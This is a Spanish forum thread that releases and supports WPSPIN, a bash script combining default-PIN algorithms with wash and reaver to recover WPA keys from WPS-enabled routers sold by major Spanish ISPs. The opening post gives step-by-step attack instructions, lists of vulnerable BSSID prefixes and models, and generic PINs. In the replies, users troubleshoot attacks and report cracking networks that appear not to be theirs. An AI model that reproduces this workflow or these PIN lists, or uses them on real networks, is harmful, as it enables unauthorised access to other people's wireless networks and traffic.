Lampiweb.com

Auditoria Wireless => Auditoria Linux => Mensaje iniciado por: kcdtv en Diciembre 08, 2012, 22:57:05 pm

Título: WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 08, 2012, 22:57:05 pm


29 enero 2014
WPSPIN 1.5
ir al final del post



http://www.youtube.com/watch?v=IQRsDh4ljuo

 
 WPSPIN.sh es la versión linux (descarga en fin de post) del conjunto de herramientas sacadas por el grupo de trabajo de www.lampiweb.com.
Utiliza varios algoritmos y la base de datos de lampiweb,com (vinculo mas bajo) , tenéis mas detalles en el readme y más abajo en "Sobre lo desvelado".
WPSPIN les asistirá en todo el proceso de ataque WPS  gracias a su cómodo modo automatizado permitiendo recuperar en pocos segundos las llaves WPA de los numerosos dispositivos soportados
Mas de 25 modelos de routers, mas de 100 inicio de bssid soportados,  de marcas tan importantes como belkin, Huawei, D-Link, TP-Link, Samsung, Conceptronic....
Hablamos de modelos distribuidos de forma masiva por las principales empresas de Telefonia-Internet  de España, telefonica con sus WLAN_XXXX y MOVISTAR_XXXX, Orange con sus FTE_XXX, Vodafone y sus Vodafone_XXXX ...           

Para los impacientes la descarga esta al final de este primer post  :)


                           
 ¡NUEVO! 14 diciembre 2012 23:23
Se han integrado Los PINes genéricos del hilo  
Patrones de PINs para WPA




I > SOBRE LO DESVELADO




  Los trabajos usan 4 algoritmos
Todos estos fueron desarrollados para el HG532c de HUAWEI con essid FTE-XXX (sabiendo el essid o en modo essid desconocido) 
Nos dimos cuenta que uno de ellos valía para muchos routeurs HG566 con essid vodafone, los N routeurs de belkin etc.
Mas adelante nos dimos cuenta que este algoritmo había sido descubierto por ZhaoChunsheng el  04/07/2012 sobre un routeur de marca Tenda en un script llamado ComputePIN-C83A35...
...publicado cómo lo podéis ver por maripuri hace un tiempo ya  ;D  :P
  Desgraciadamente no les puedo dar un link hacía la web del autor porque la web de Beini esta fuera de servicio.  :(
   
Si doy los créditos a zaoChunsheng debería dar les a los colegas también  :P

-  Compota lo vi en HG566 vodafoneXXX,
-  Maripuri (y Zeiffel andaba por ahí erca ;)) en telnat Wlan_XXX,
-  Dirneet en tendat y Zyxel
-  Lo vi en beklin y encontré el algoritmo FTE-XXXX ... y el modo FTE desconocido ha sido cambiando así que es difícil decir otra cosa que fue del grupo de trabajo :P
 
 Antares_145 de crack-wifi.com escribió le función checksum en bash, generación y comprobación. Merci l'ami.  :)
 Con la función y los scripts de nuestro compi 1camarón1  en nuestro forum linux he tenido todo bajo la mano para hacerlo.  ;)
 Gracias a r00tnull por sus maravillas.

 Muchas, muchas gracias a papones de www.auditriaswireless.net para el alojamiento.

Y por supuesto gracias a  tod@s vostr@s de lampiweb.com  ;)

  Este descubrimiento es algo intrigante.
Que un mismo fabricante utilice dos algoritmos cercanos en dos modelos de routeurs distintos se entiende...
... Y hasta si usa el mismo para varios modelos, también se concibe.
  Pero Encontrarse el mismo algoritmo  en una multinacional China (huawei)  y otra de Estados Unidos (Belkin) el mismo día parece un chiste.  :o
 
 



II > INSTRUCCIONES WPSPIN.sh




1> EJECUTAR EL SCRIPT


WPSPIN esta escrito en bash (interprete de comando por defecto de linux) y su modo de ejecución es similar al de cualquier script.

  -1> descomprimir el paquete descargado,
 
  -2> abrir un terminal en el mismo directorio
 
  -3> y escribir "bash WPSPIN.sh" en consola + <Enter>
Código: [Seleccionar]
bash WPSPIN.sh

Pequeña guía con imágenes.

 Lo podéis hacer con click derecha sobre vuestro fichero .zip > "extract here" o con el comando
Código: [Seleccionar]
unzip rute_del_archivo.zip Para uzar el comando necesitarían estar situados correctamente, es decir en el directorio dónde tenéis WPSPIN.zip
  Podéis hacer click derecha en el directorio y seleccionar el opción "abrir terminal aquí" o "Open terminal here"
  Podéis escribir "cd", dejar un espacio, arrastrar y soltar la carpeta dónde teneís las descargas, darle a <enter> y estáis situados en la carpeta.
  O podéis escribir el camino a mano.
  En mi caso tengo WPSPIN.sh en mi "carpeta para descargas",

(http://storage8.static.itmages.com/i/13/0603/h_1370264020_2900639_a0cfc26d9b.png)

 descomprimo y podéis ver la carpeta WPSPIN

(http://storage6.static.itmages.com/i/13/0603/h_1370264209_4404603_5a94fab8fb.png)


3> Lanzar el script


  En la misma consola, una vez que estáis situados ( cd WPSPIN), iniciáis el script con
 
Código: [Seleccionar]
bash WPSPIN.sh



2>SEGUIR las INSTRUCCIONES


Primero elegimos el idioma ( 2 para español )

(http://storage7.static.itmages.com/i/13/0603/h_1370264432_9606901_92ac3ca179.png)

  Si no tenemos dispositivo wireles compatible o que no tenemos aircrack-ng o reaver instalado (el programa es compatible con reaver 1.3 y 1.4 y se adapta según lo que gastamos), nos encontraremos limitado a una versión reducida de WPSPIN dónde solo es posible generar PINes por defecto o redetectar las interfaces en búsqueda de un chipset compatible


(http://storage2.static.itmages.com/i/13/0603/h_1370267756_1642902_eb0a069276.png)


  Si tenemos varias interfaces, el programa nos pedirá cual queremos usar enseñándonos las interfaces disponibles así que su chipset.

(http://storage4.static.itmages.com/i/13/0603/h_1370265642_8805568_9045a45a5c.png)

Podemos volver al menú anterior en todos momento para cambiar las interfaces y redetectar las si enchufamos otro dispositivo USB para usar lo.

Si tenemos una sola interfaz llegamos directamente al menú principal con sus 5 opciones;

(http://storage8.static.itmages.com/i/13/0603/h_1370264657_3884322_236ac1f2f4.png)

   - modo guiado : associa wash y reaver para proponer una interfaz sencilla dónde el usuario entra el numero de la red   deseada para atacarla, veremos los detalles enseguida.

   - Pin genrador :Para los nostálgicos del primer WPSPIN  :P  o por si no disponemos de tarjeta wireless pero queremos generar el PIN por defecto
 
   - No hace falta describir las otras opciones creo que su función es bastante obvia  ;) Señalar que el opción cambiar interfaz solo se activará si hay varías interfaces compatibles.  ;)


                                                 MODO GUIADO



se lanza el scan en una segunda consola,

(http://storage2.static.itmages.com/i/13/0603/h_1370266467_8793512_5c279243d7.png)

 cuando estemos satisfechos, la cerramos con ctrl+c o usando el ratón.
 En nuestro Terminal principal se nos enseña el resultado poniendo el PIN por defcto de la red
Si es verde la red esta soportada
Si es de color naranja el bssid esta desconocido o no soportado.
Si en la columna "abierto" veis un "No" en rojo, el ataque es imposible y se debe esperar a que sea abierto otra vez el WPS

(http://storage4.static.itmages.com/i/13/0603/h_1370266948_5143730_42120b40b5.png)

Seleccionamos nuestro objetivo, obtenemos algo mas de información sobre el AP y acedemos a nuestro menú ataque

(http://storage8.static.itmages.com/i/13/0603/h_1370271372_4090891_6a5b6c9e3b.png)


Podríamos escoger otro objetivo de la lista  (opción 2 )
Podríamos volver al menú anterior para redetectar/cambiar interfaces o efectuar un nuevo escaneo con el opción 3
O cambiar de idioma o salir.
El opción nos permite llevar un ataque con reaver que nos permitirá recuperar la llave WPA.
Si tenemos éxito se guarda la llave en un fichero de texto en nuestra carpeta WPSPIN

(http://storage2.static.itmages.com/i/13/0603/h_1370271790_2913080_abc8859f54.png)

(http://storage8.static.itmages.com/i/13/0603/h_1370271665_6119315_6c41b73f87.png)



Saludos y gracias a tod@s vosotr@s para su colaboración y apoyo,. sois l@s mejores.  ;)


WPSPIN 1.2  Añadidos PINes genéricos  14 diciembre 2012 23:23


(http://i.imm.io/P7ll.png)


(http://i.imm.io/P7nR.png)


WPSPIN 1.3Mejoras del código y mas dispositivos soportados  23 enero 2013


(http://i.imm.io/UuTs.png)


(http://i.imm.io/UuUq.png)


WPSPIN 1.4, modo guiado, multi idioma, más dispositivos soprtados  24 mayo 2013



(http://storage2.static.itmages.com/i/13/0603/h_1370267756_1642902_eb0a069276.png)

(http://storage4.static.itmages.com/i/13/0603/h_1370265642_8805568_9045a45a5c.png)

(http://storage4.static.itmages.com/i/13/0603/h_1370266948_5143730_42120b40b5.png)







III > LISTADO ROUTEURS AFECTADOS + lista BSSID conocidos




Pinchar aquí para visualizar la lista de bssid soportados

lista de bssid soportados (mirror)

(mirror 2)


puedes copiar y pegar la lista desde ahí  ;)




IV > REGISTRO DE CAMBIOS




10 diciembre 2012 16:13 :
  Soporte a PINes empezando por 0 gracias a los datos comunicados por atim y tresal. Muchas gracias a los dos.  ;)
10 diciembre 2012 21:28 :
  Nueva mac soportada : 6A:C0:6F (HG566 con essid vodafoneXXXX )
12 diciembre 2012 14:33 :
  Versión genérica sin bug de salida en consola en backtrack y otras distribuciones.
14 diciembre 2012 23:23
  Segunda entrega: Añadidos los pines genéricos conocidos
23 enero 2012
 Tercera entrega, se da soporte a 
  - 7 bSSID nuevos vodafoneXXXX (HG566a) > 6A:3D:FF / 6A:A8:E4 / 6A:C0:6F / 6A:D1:67 / 72:A8:E4 / 72:3D:FF / 72:53:D4
  - 2 bSSID nuevos WLAN_XXXX (PDG-A4001N de adbroadband) > 74:88:8B / A4:52:6F
  - ¡2 nuevos dispositivos afectados!:
      1) SWL (Samsung Wireless Link), eSSID por defecto SEC_ LinkShare_XXXXXX.  2 bssid soportados conocidos > 80:1F:02 / E4:7C:F9
      2) Conceptronic  c300brs4a  (eSSID por defecto C300BRS4A ) bssid conocido > 00:22:F7   
  Añadidas reglas de comprobación de r00tnull (validez bSSID, mejora filtro essid FTE)
  Más información proporcionada en salida
  Añadidos filtros para bssid con varios essid por defecto  posibles
  Una sola versión par esta entrega (valida para todas las distribuciones) en lugar de dos                                           
  Re-escritura del código para optimizarlo; ver las anotaciones del código para detalles.
31 enero 2013
 Arreglado bug con essid FTE
 Reglas de comprobación nuevas para essid FTE-XXXX (se verifica que el bssid esta en la base de datos, se verifica la conformidad
de la differencia bssid - essid )
 - 1 nuevo dispositivo soportado  Zyxel,P-870HNU-51B, WLAN_XXXX > FC:F5:28 (cf full disclosure nº9 Patrones de PINs para WPA
24 mayo 2013
- Reescritura completa del codigo para integrar nuevas funcionnes:
          - Multi language         
          - Un modo automatizado bazado en wash y reaver wps
          - Manejo de interfaces (automatic if only one interface is present, acting as filter if no mode monitor is possible to reduce tions)
          - New supported bssid
              -  2 news bssid for FTE-XXXX (HG532c)   34:6B:D3 and F8:3D:FF
              -  16 new bssid for vodafone HG566a
               62:23:3D 62:3C:E4 62:3D:FF 62:55:9C 62:7D:5E 62:B6:86 62:C7:14 6A:23:3D 6A:3D:FF 6A:7D:5E 6A:C6:1F 6A:D1:5E 72:53:D4 72:55:9C 72:6B:D3  72:A8:E4 
          - New supported devices ( 9 models )   
              -  TP-LINK  >  TD-W8961ND v2.1 default SSID TP-LINK_XXXXXX  3 known bssids ; F8:D1:11 B0:48:7A 64:70:02
              -  EDIMAX  >  3G-6200n and EDIMAX  >  3G-6210n    bssid ; 00:1F:1F defaukt SSID : default
              -  KOZUMI >  K1500 and   K1550  bssid : 00:26:CE
              -  Zyxel  >  P-870HNU-51B      bssid : FC:F5:28
              -  TP-LINK  TP-LINK_XXXXXX  TL-WA7510N    bssid : 90:F6:52:
              -  SAGEM FAST 1704 > SAGEM_XXXX    bssid :  7C:D3:4C:
# 1.5 ( 24/01/2014 )
#
#        - Imlemented bash adaptation of esay box arcadyan vodane PIN and WPA algorithm by coeman76
#        - Grafic changes and code optimization
#        - New filters for preventing permissions issues, directory issues, unisntalled tools isuues, interfaces issues
#        - Fixed the bug for FTE red 
#        - New option to define a sequence of PIN to try first ( thanks to Spawn for recursive_generator )
#        - New option to enter manually a different PIN then than one proposed
#        - -p option with reaver is not used any longuer due to lost of quality of attack and PIN are genrated live
#        - detection of processing error to backup the sesssion untill the PIN that could create a problem in order to avoid the "99,99% bug"
#        - function to adapt mode monitor managment with RT 3XXX chipsets
#        - Default WPA key is shown once target has been selected if the algorithm for default wpa is known ( still a lot to implement )
#        - prevent reaver failure when saving a sesssion
#        - bash adaptation of arcadyan easy box WPA and PIN generator by coeman76
#        - display the progress of a former sesssion before attacking the target again
#        - option to allow the user to customize the reaver command line
#        - New supported bssid
#             - modification for 08863B with new devices, repeater N300 Dual-Band Wi-Fi Range Extender no compatible, with AP rate limit
#             - new bssid  F81A67 for TD-W8961ND with AP RATE LIMIT
#             - new vodafone-XXXX BSSID = 6296BF 6ACBA8 62:CB:A8 72:CB:A8....
#             - new bssid for PDG4100ND D0:D4:12 with refereed PIN 88202907 
#          - New supported devices
#             - NEW DEVICES, D-LINK, DSL-2730U (bssid = B8A386 | B8A386) & DSL-2750U C8:D3:A3 , with respectively generic PIN 20172527 &  #21464065
#             - NEW DEVICE, ZTE ; ZXHN_H108N , default generic 12345670 bssids: F8:1B:FA & F8:ED:80 default ssid = MOVISTAR_XXXX
#             - 08:7A:4C E8:CD:2D 0C:96:BF NEW DEVICE   Orange-XXXX / HG530s ( Huawei ) 
#             - E4:C1:46 for MOVISTAR_XXXX. Model : Observa Telecom - RTA01N_Fase2 comercialized by Objetivos y Servicios de Valor 
#             - new TP-LINK device affected TD-W8951ND with AP RATE LIMIT and known bssid A0:F3:C1:
#             - the last Bbox, with default ssid Bbox-XXXXXXXX, manufactures by SAMSUNG is vulnerable , known BSSID = 5C:A3:9D DC:71:44 D8:6C:E9
#             - VodafoneXXXX New device for mac 1C:C6:3C 50:7E:5D 74:31:70 84:9C:A6 88:03:55 full disclosure aracadyan PIN-WPA model : ARV7510PW22
#             - HG 532e from djibouti, default ssid HG532e-XXXXXX , mac  EC:23:3D
#             - DG950A from Arris Interactive  L.L.C, mac 00:1D:CF, default SSID ARRIS-XXXX
#             - CDE-30364 from Hiltron - used by spanish ISP OnO with default ssid OnOXXX0 - mac : BC1401 68B6CF 00265B
V > DESCARGAS


[size=22pt][b]NUEVA VERSION DISPONIBLE,[color=red] WPSPIN 1.5[/color] CLICK AQUI[/b][/size]






Descarga


[img width=300 height=104]https://s25.postimg.cc/c7mfwbky7/maripuristore.jpg[/img]



Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Miguel21 en Diciembre 08, 2012, 23:30:54 pm
Esto funcionaria en xiaopan?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 08, 2012, 23:49:20 pm
Pruebalo, no te va a comer   ;D

PD: aquí tienes la respuesta
Citar
WPSPIN esta escrito en bash (interprete de comando por defecto de linux) y su modo de ejecución es similar al de cualquier script.
Xiaopan = linux.  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: carasucia en Diciembre 09, 2012, 00:02:18 am
Eres un monstruo kcdtv.Gracias.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Miguel21 en Diciembre 09, 2012, 00:03:25 am
si me dijeras en mp como lo descargo desde alli y lo instalo el wpspin

Diciembre 09, 2012, 00:24:09 am
bueno me he bajado la apli de betis-jesus de windows y en en una ono me da un pin en el pin 1, y otro pin el 123456@@@ en pin defect generico cual es el pin?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 09, 2012, 03:01:23 am
El link es este,   ;)
WPSPIN (versión española)
No hace falta instalar nada, simplemente lo ejecutas.
Esta escrito en bash, trabaja directamente en la consola linux que tienes en xiaopan o en cualquier linux que sea,
No necesitas tener instalado absolutamente nada para que funcione y que te de el PIN.
 A modo de generador lo puedes usar en cualquier distribución linux
¿Cual es el paso que no entiendes/ que te falla en las explicaciones que he puesto más arriba o en el README.txt?
No respondo por privado a dudas que tienen su sitio en el foro ;)

Citar
bueno me he bajado la apli de betis-jesus de windows y en en una ono me da un pin en el pin 1, y otro pin el 123456@@@ en pin defect generico cual es el pin?

No te puedo responder, tendrías que preguntarlo a betis-jesus en el hilo adecuado, lo que te puedo decir es de mirar la lista de bssid y essid soportados y no hay soporte para OnO.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Balastro en Diciembre 09, 2012, 08:55:10 am
Hacéis que sea fácil lo difícil.    :)
Muchas gracias !!!.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: carasucia en Diciembre 09, 2012, 11:47:28 am
El link es este,   ;)
WPSPIN (versión española)
No hace falta instalar nada, simplemente lo ejecutas.
Esta escrito en bash, trabaja directamente en la consola linux que tienes en xiaopan o en cualquier linux que sea,
No necesitas tener instalado absolutamente nada para que funcione y que te de el PIN.
 A modo de generador lo puedes usar en cualquier distribución linux
¿Cual es el paso que no entiendes/ que te falla en las explicaciones que he puesto más arriba o en el README.txt?
No respondo por privado a dudas que tienen su sitio en el foro ;)

No te puedo responder, tendrías que preguntarlo a betis-jesus en el hilo adecuado, lo que te puedo decir es de mirar la lista de bssid y essid soportados y no hay soporte para OnO.
Perdona mi ignorancia pero,teniendo en cuenta que también es linux, ¿se podría hacer correr de alguna manera en android?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Diciembre 09, 2012, 14:01:54 pm

Si, es factible..  pero hay que adaptar el code.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: leocadio en Diciembre 09, 2012, 15:20:06 pm
La opción -p según veo en el menú también funciona en el reaver 1.4 ¿estoy en lo cierto? Es que en el texto de inicio parece dar a entender que esa opción es del 1.3
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: carasucia en Diciembre 09, 2012, 15:22:12 pm
Si, es factible..  pero hay que adaptar el code.
¿Y eso de adaptar el code es muy complicado?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: betis-jesus en Diciembre 09, 2012, 15:41:56 pm
El que mejor te puede responde a eso es kcdtv que es que a creado es script, asi un Linux android es factible porta el código a android

Yo es usado reaver con la opción –p versión 1.4 nunca es usado la versión anteriores y desconozco si la versión 1.3 tiene esa opción -p
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: leocadio en Diciembre 09, 2012, 15:46:06 pm
Pruebo con wlanXXXX mac DC:OB:1A, No es de las soportadas, pero para probar pongo el pin que me sale y empieza a probar siempre el mismo pin pero a partir del 90% va aumentando el porcentaje ¡¡¡sin cambiar de pin ¡¡¡ y no recibe M6. Creo que pierdo el tiempo
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Coeman76 en Diciembre 09, 2012, 18:34:12 pm
Enhorabuena kcdtv y al equipo de Lampiweb

Un saludo
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Diciembre 09, 2012, 19:39:00 pm
Citar
¿Y eso de adaptar el code es muy complicado?
Si sabes programar para la plataforma Android tu mismo te responderás.. yo no se nada de Android.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: notepad en Diciembre 10, 2012, 08:53:25 am
Gran aporte kcdtv, muy buen trabajo ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 10, 2012, 09:32:02 am
Citar
Perdona mi ignorancia pero,teniendo en cuenta que también es linux, ¿se podría hacer correr de alguna manera en android?

Si hablamos de generar los PIN normalmente te lo hará sin problemas, esta escrito en bash así que corre en la consola linux (terminal o shell en inglès)
Por lo de atacar con reaver, ya es más problemático porque primero haría falta dirvers y reaver para android.
yo te aconsejo de generar los pines con el generador, lo copias y lo pegas en una utilidad "normales" que tienes en andoid y que permite conectar mediante wps.
durante la pausa de comer pedira un smartphone con android para probar el script, y si me dices que utilidad tienes y que puuede manadr PIN WPS, puedo probar hacer para que te mande directamente el PIN sin que tengas de copiar/pegar lo.
No prometo nada porque nisiquiera tengo android y no conozco.
 tengo que revisar primero el codigo general para dar soporte a mas bssid, pero si me dices el nombre de un gestor de redes para android capaz de mandar PIN, miro si puedo automatizar el proceso.

Diciembre 10, 2012, 09:48:12 am
Pruebo con wlanXXXX mac DC:OB:1A, No es de las soportadas, pero para probar pongo el pin que me sale y empieza a probar siempre el mismo pin pero a partir del 90% va aumentando el porcentaje ¡¡¡sin cambiar de pin ¡¡¡ y no recibe M6. Creo que pierdo el tiempo

Estas es seguro que no siguen niguno algoritmo integrado en WPSPIN.  ;)
He dejado que genere un PIN aúnque la red no este soportada o desconocida porque puede ser que un algoritmo cercano o este mismo sea utilizado...
Pero la que mencionas es un adb-broadband y no sigue este algoritmo.
Mas adelante integrare los PINes genéricos del hilo "patrones de PiN" que tenemos para tener todo bajo la mano.



Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Diciembre 10, 2012, 18:49:18 pm

Actualizada la versión de linux en el 1er post:   10 diciembre 2012 16:13
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ñanduti en Diciembre 10, 2012, 18:56:02 pm
muchas gracias una vez mas a todos/as por el gran trabajo  ;) ;) ;) ;) salu2
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Balastro en Diciembre 10, 2012, 22:24:41 pm
 
Actualizada la versión de linux en el 1er post:   10 diciembre 2012 16:13

Hola, me he descargado esta última versión pero no puedo descomprimir la carpeta. Creo que esta última versión tiene algún problema.

Gracias.

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: acid_lemon en Diciembre 10, 2012, 22:26:50 pm
Buenas, he visto que hay también WLAN_XX con mac 00:A0:26:XX:XX:XX, ¿sabéis si también valen esto WPS?

Gracias
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Diciembre 10, 2012, 22:29:37 pm

Es cosa de tuya, la descarga descomprime perfectamente.

(http://picturestack.com/174/890/TzXCapturaHT1.jpg)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 10, 2012, 22:36:03 pm

Hola, me he descargado esta última versión pero no puedo descomprimir la carpeta. Creo que esta última versión tiene algún problema.

Gracias.

No, esta bien. No se que SO usas, si eres en linux y que no te sale con click derecha "extraer", hazlo en linea de comando
Código: [Seleccionar]
unzip WPSPINes
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Balastro en Diciembre 10, 2012, 22:51:59 pm
Ok, estoy con ubuntu 10.04 y he probado con botón derecho y por línea de comandos pero no lo consigo, sin embargo con la 1ª versión no tuve ningún problema.
Seguro que estoy haciendo algo mal.  ;)


Muchas gracias.



Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 10, 2012, 23:05:33 pm
Muy extraño porque hizo los dos paquetes desde la misma computadora y desde xubuntu que es lo mismo que ubuntu (con XFCE en lugar de unity).  :o
por defecto se te descarga en descargas.
Abres tu carpeta "descargas", haces click derecha "abrir terminal aquí" y estas situado correctamente
ahora entras
Código: [Seleccionar]
unzip WPSPINes.zip
tendrías que ver en consola
Código: [Seleccionar]
Archive:  WPSPINes.zip
   creating: WPSPINes/
  inflating: WPSPINes/LICENSE.txt   
  inflating: WPSPINes/README.txt     
  inflating: WPSPINes/WPSPIN.sh     
  inflating: WPSPINes/WPSPIN.sh~     
y ver aparecer en tu carpeta descargas una carpeta descomprimida
"WPSPINes"





Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Balastro en Diciembre 10, 2012, 23:53:53 pm
Ya lo he conseguido !!

Creo que el problema que tenía es que la primera vez el paquete lo baje desde   windows y fué cuando no funcionó (aunque no se muy bien por que). Pero esta vez lo descargé con ubuntu y fué todo muy bién, tal como tu dijiste.

Pido disculpas por las molestias causadas, agradeciendo una vez mas tú trabajo y la de todo el equipo de lampiwep.com.

Saludos.   
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 11, 2012, 00:23:09 am
No hace falta pedir disculpas, a tod@s nos pasa cosas del palo... lo importante es que ahora esta aclarado  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Miguel21 en Diciembre 11, 2012, 01:04:31 am
buenas utilize el wpspin de betis-jeus y bueno me encontro el pin ebn verde  de una fte-xxxx pero ahora lo puse en inflator y no la coge dice warning not associated y en minidwep puse el pin pero sale el pin que he metido pero va de 90% a l 91% y asi sigue y en teoria tendria que haber saltado sin mas verdad, sin haber salido el 90% o 91% verdad?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 11, 2012, 01:15:59 am
Si te pone "not associated" o que va adelantando sin hacer nada es que no estas en condiciones para efectuar el ataque.
Hay que ser desconectado de internet durante todo el proceso con la interfaz wlan bajada.
Necesitas un RXQ a 80 o más si posible y un PWR bueno.
Que no haya clientes conectados.
Aumenta el delay para el timeout (t -2 por ejemplo)
PD: los problemas sobre reaver o inflator se tratan en su topic.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: miguel7 en Diciembre 11, 2012, 03:48:14 am
Muchas gracias señores! laverdad es que he tardado un poco mas, pero lo importante es que lo he conseguido. gracias. no me esperaba tener satisfacciones, pero si, las he tenido.  miliones de gracias. ;) soys los mejores ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maxi123 en Diciembre 11, 2012, 09:15:10 am
Ante todo gracias por el esfuerzo realizado por el equipo. Os estoy muy agradecido.
Me he bajado el PIN'GUI by maripuri para usarlo con wine, y el WPSPIN (versión española) de KCDTV.
He probado los dos y creo no estar equivocado si digo que los pins localizados de FTE por defecto, no
coinciden en los dos programas. Los pins FTE con essid cambiada si coinciden al igual que los de vodafone.
Gracias y un saludo.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 11, 2012, 09:24:24 am
¿puedes pasar me bssid et essid de dicha red por privado por favor?


[time]Diciembre 11, 2012, 09:26:48 am[/time]
es para que vea de dónde puede venir el fallo. Gracias por comentar  ;)

[time]Diciembre 11, 2012, 09:43:07 am[/time]
a mi me dan los mismos resultados , bajo wine también  ;)

Pongo los datos de una red ficticia FTE-FFFF con bssid FF:FF:FF:FF:FF:FF y obtengo el mismo resultado
Y es así con todos los datos de los cuales disponemos.


(http://i.imm.io/OJgS.png)


Gracias por los datos, el fallo se debe a que has usado casos ficticios con valores demasiados "ireales" para que funcionne.
funcionan bien en mode essid desconocido porque se toma solo en cuenta el bssid y no afecta el hecho de que el essid sea con un valor "ireal" en base del bssid.  ;) 

[time]Diciembre 11, 2012, 10:22:21 am[/time]
En todos casos se agradecen mucho las pruebas y la busqueda de fallos para que se puedan  coregir.  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maxi123 en Diciembre 11, 2012, 12:12:13 pm
Entendido.
Gracias por la respuesta.
Hasta otra.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ALGOIG en Diciembre 11, 2012, 18:32:31 pm
Seguramente me este desviando del tema, me funciona bien en linux, solo tengo un problemilla no relacionado con el funcionamiento de la utilidad y es hacerle un acceso directo en el escritorio o un script (que no se como) para que arranque directamente sin tener que abrir consola, escribir sh wpspin.sh.

no se si es una barbaridad barbara lo que estoy preguntando pero no tengo apenas idea de linux. Si no es el sitio disculparme.

utilizo una live en vbox con una alfa 500mw
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: gladiator1976 en Diciembre 12, 2012, 00:52:18 am


To be continued

hola
acabo de probarlo en una vodafon con mac:72:E8:7B por el canal 8 y en 20 segundos todo perfecto


en cambio en wlan_xxxx con mac DC:0B:1A   me quiso meter el pin 9060xxxx  el cual no era el acertado pues el suyo es 1653xxxx, por lo menos en el modelo y serial de este router,
¿supongo que por eso es el To be continued verdad?

enorme trabajo kcdtv
y yo que no tengo casi ni idea de como manejar el linux, me ha sido algo mas que sencillo poder utilizarlo,
Como ha dicho Balastro:

Hacéis que sea fácil lo difícil.

un saludo y gracias
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Powersound en Diciembre 12, 2012, 02:57:44 am
Hola a tod@s.

Bajada la aplicacion , aun sin utilizar completamente, solamente descomprimida , y ejecutada en backtrack 5 R3 , para familiarizarme con la aplicacion.

La interface grafica de consola , creo que no se muestra correctamente .

(http://www.imgjoe.com/x/1screenshot.jpg)

(http://www.imgjoe.com/x/2lwl.jpg)

Gracias a tod@s los creadores de esta aplicacion , en especial a kcdtv ,  por hacerla para linux .

Sois unos cracks.

Un saludo para tod@s.






Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 12, 2012, 08:26:52 am
Gracias por probarlo en backtrack  ;).
Creo que se el porque del fallo, lo mirare para dejar una versión backtrack.

hola
acabo de probarlo en una vodafone con mac:72:E8:7B por el canal 8 y en 20 segundos todo perfecto


en cambio en wlan_xxxx con mac DC:0B:1A   me quiso meter el pin 9060xxxx  el cual no era el acertado pues el suyo es 1653xxxx, por lo menos en el modelo y serial de este router,
¿supongo que por eso es el To be continued verdad?

enorme trabajo kcdtv
y yo que no tengo casi ni idea de como manejar el linux, me ha sido algo mas que sencillo poder utilizarlo,
Como ha dicho Balastro:

Hacéis que sea fácil lo difícil.

un saludo y gracias

Gracias a ti por los comentarios  :)
El script de momento se limita a aplicar los algoritmos conocidos y he dejado que te de un PIN para los routeurs desconocidos "por si hay suerte".
La meta era materializar el fallo descubierto.
